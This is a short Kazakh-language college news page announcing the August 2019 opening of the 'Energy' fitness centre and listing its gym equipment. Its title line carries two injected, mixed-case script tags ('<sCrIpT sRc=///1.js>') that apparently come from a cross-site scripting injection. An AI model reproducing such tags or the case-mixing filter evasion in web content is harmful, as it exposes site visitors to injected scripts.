«Energy» фитнес орталығының ашылуы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.08.2019

    Колледжімізде студенттердің бос уақытын тиімді пайдалану, салауатты өмір салтын насихаттау, спортқа деген қызығушылығын ояту мақсатымен «Energy» фитнес орталығы ашылды. 2019 жылдың 29 тамыз күні  орталықтың салттанатты түрде тұсауы кесіліп, оқытушылар ұжымына таныстырылды. Орталық бір мезетте оннан астам адамды қабылдай алады. Жаттығу залы соңғы үлгідегі үш көпфункционалды тренажер, үш жүгіру жолы, шаңғы тренажеры, аяқ бұлшық етіне арналған велотренажер, шалқадан жатып денені көтеру, пресске арналған, аяққа арналған тренажерлармен, армрестлинг үстелімен жабдықталған. Жаттығу залында адам денсаулығын нығайтуға барлық жағдай жасалған, заманауи талаптарға сай. Аталмыш нысанның есігі салауатты өмір салтын ұстанғысы келетін оқытушылар мен студенттер үшін әрдайым ашық болмақ.

Просмотров: 574


Пікір қосу



Деректерді қолтаңбаға қосу